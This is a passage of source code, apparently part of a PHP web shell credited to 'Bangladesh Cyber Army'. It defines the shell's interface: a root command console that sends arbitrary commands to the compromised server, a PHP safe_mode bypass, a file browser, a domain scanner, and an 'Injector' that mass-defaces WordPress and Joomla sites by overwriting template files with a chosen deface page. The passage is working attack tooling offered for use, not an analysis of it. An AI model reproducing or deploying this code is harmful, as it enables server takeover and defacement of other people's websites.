2557. $(\'.conf\').each(function(){
2558.  
2559. var id = $(this).attr(\'title\');
2560.  
2561. doToggle(id);
2562.  
2563. });
2564.  
2565. }
2566.  
2567.  
2568.  
2569. function doToggle(dd){
2570.  
2571. if($(\'#injchk\'+dd).is(\':checked\')){
2572.  
2573. $(\'#injc\'+dd).css(\'background-color\',\'red\');
2574.  
2575. $(\'#injchk\'+dd).attr(\'checked\',false);
2576.  
2577. }else{
2578.  
2579. $(\'#injc\'+dd).css(\'background-color\',\'#76BBEB\');
2580.  
2581. $(\'#injchk\'+dd).attr(\'checked\',true);
2582.  
2583. }
2584.  
2585. }
2586.  
2587.  
2588.  
2589. function doSSH(){
2590.  
2591. $(\'#status\').html("Status: Requesting...");
2592.  
2593. var cmd = $(\'#sshcmd\').val();
2594.  
2595. $(\'#sshcmd\').val("");
2596.  
2597. $.post("", { ac: "ssh",command: cmd},
2598.  
2599. function(data) {
2600.  
2601. $(\'#sshoutput\').append("[root@bca~]# <br />"+data+"<br />");
2602.  
2603. $(\'#status\').html("Status: Done.");
2604.  
2605. });
2606.  
2607. }
2608.  
2609. </script>
2610.  
2611.  
2612.  
2613. <div class="sshbox" id="sshbox">
2614.  
2615. <br />
2616.  
2617. <div id="sshoutput"></div>
2618.  
2619. [root@bca~]# <input onkeydown="if (event.keyCode == 13) doSSH();" type="text" id="sshcmd">
2620.  
2621. </div>
2622.  
2623.  
2624.  
2625. <div id="sidebar" class="sidebar">
2626.  
2627.  
2628.  
2629. <div class="smnu" id="smnu" class="smnu">
2630.  
2631. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'Security Information\');doReq2(\'secinfo\');return false;">Security Vulnerability</a></br>
2632.  
2633. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'System Information\');doReq2(\'sysinfo\');return false;">System Information</a></br>
2634.  
2635. &raquo; <a href="" onClick="$(\'#infotitle\').html(\'PHP Info\');doReq2(\'phpinfo\');return false;">PHP Info</a></br>
2636.  
2637. &raquo; <a href="" onClick="filebrs(\'\'); return false;">File Browser</a></br>
2638.  
2639. &raquo; <a href="" onClick="$(\'#infotitle\').html(\'Scanned Domains\');doReq2(\'chknamed\');return false;">Get All Domains</a></br>
2640.  
2641. &raquo; <a href="" onClick="doReq(\'chkph\');return false;">CMS Detector [Simple]</a></br>
2642.  
2643. &raquo; <a href="" onClick="$(\'#inject\').show();doUpdt(\'chkph2\');return false;">CMS Detector [root]</a></br>
2644.  
2645. &raquo; <a href="" onClick="doReq2(\'safebypass\');return false;">Bypass PHP Safe_Mode</a></br>
2646.  
2647. &raquo; <a href="">Network Tools</a></br>
2648.  
2649. &raquo; <a href="">SQL Manager(Coming Soon)</a></br>
2650.  
2651. &raquo; <a href="" onClick="hideAll(); $(\'#sshbox\').show(); return false;">Command Console</a></br>
2652.  
2653. &raquo; <a href="?ac=killme">Kill Me</a></br>
2654.  
2655.  
2656.  
2657. </div>
2658.  
2659. <div class="stitle" onClick="sidebarz();">O</br>P</br>T</br>I</br>O</br>N</br>S</div>
2660.  
2661. </div>
2662.  
2663.  
2664.  
2665. <div id="sidebar2" class="sidebar" style="display:none;right:1px;left:auto;">
2666.  
2667. <div class="smnu" style="float:right;" id="smnu2" class="smnu">
2668.  
2669. <div id="injmain">
2670.  
2671. &raquo; <a href="" onClick="doInject(); return false;">Start Injecting</a></br>
2672.  
2673. &raquo; <a href="" onClick="">Export</a></br>
2674.  
2675. &raquo; <a href="" onClick="rmvErr(); return false;">Remove Error</a></br>
2676.  
2677. &raquo; <a href="" onClick="rmvSlct(); return false;">Remove Selected</a></br>
2678.  
2679. &raquo; <a href="" onClick="retryTimeout(); return false;">Retry timeout</a></br>
2680.  
2681. &raquo; <a href="" onClick="alert(\'Do It Manually :p\'); return false;">Submit to Zone-H</a></br>
2682.  
2683. &raquo; <a href="" onClick="$(\'#injmain\').hide(); $(\'#inj2nd\').show(); return false;">Settings</a></br>
2684.  
2685. </div>
2686.  
2687. <div id="inj2nd" style="display:none;">
2688.  
2689. <div class="rbox">
2690.  
2691.  
2692.  
2693. <div style="clear:both;"></div>
2694.  
2695. <center><u>WordPress</u></center><br>
2696.  
2697. <input type="checkbox" name="404_php" id="404_php" checked>404.php<br />
2698.  
2699. <input type="checkbox" name="archive_php" id="archive_php" checked>archive.php<br />
2700.  
2701. <input type="checkbox" name="index_php" id="index_php" checked>index.php<br />
2702.  
2703. <input type="checkbox" name="home_php" id="home_php" checked>home.php<br />
2704.  
2705. <input type="checkbox" name="comment_php" id="comment_php" checked>comment.php<br /><br /><br />
2706.  
2707. </div>
2708.  
2709.  
2710.  
2711. <div class="rbox">
2712.  
2713. <center><u>Joomla</u></center><br>
2714.  
2715. <input type="checkbox" name="use_com" id="use_com" checked>Use Com Installer<br />
2716.  
2717. <input type="checkbox" id="ignore_def">Ignore Default Templete<br />
2718.  
2719. </div>
2720.  
2721.  
2722.  
2723. <div class="rbox">
2724.  
2725. <center><u>Default</u></center><br>
2726.  
2727. Req/s: <input type="text" class="smit" value="10" onChange="req_limit = $(this).val();"><br />
2728.  
2729. Deface Page Link: <input type="text" class="smit" id="deface_page" value="http://naramamandiri.com/index.html"><br /><br />
2730.  
2731. </div>
2732.  
2733.  
2734.  
2735. <div style="clear:both;"></div><br />
2736.  
2737. <a href="" onClick="$(\'#injmain\').show(); $(\'#inj2nd\').hide(); return false;">Go Back</a>
2738.  
2739. </div>
2740.  
2741.  
2742.  
2743.  
2744.  
2745. </div>
2746.  
2747. <div class="stitle" style="float:right;" onClick="sidebarz2();">I</br>N</br>J</br>E</br>C</br>T</br>O</br>R</div>
2748.  
2749. </div>
2750.  
2751.  
2752.  
2753. <div style="clear:both;"></div>
2754.  
2755.  
2756.  
2757. <div id="status">Status: Idle...</div>
2758.  
2759. <div class="copyright">Copyright &copy; <a href=""><font color="red">Bangladesh Cyber Army</font></a></div>
2760.  
2761. </body>
2762.  
2763. </html>';
2764.  
2765. ?>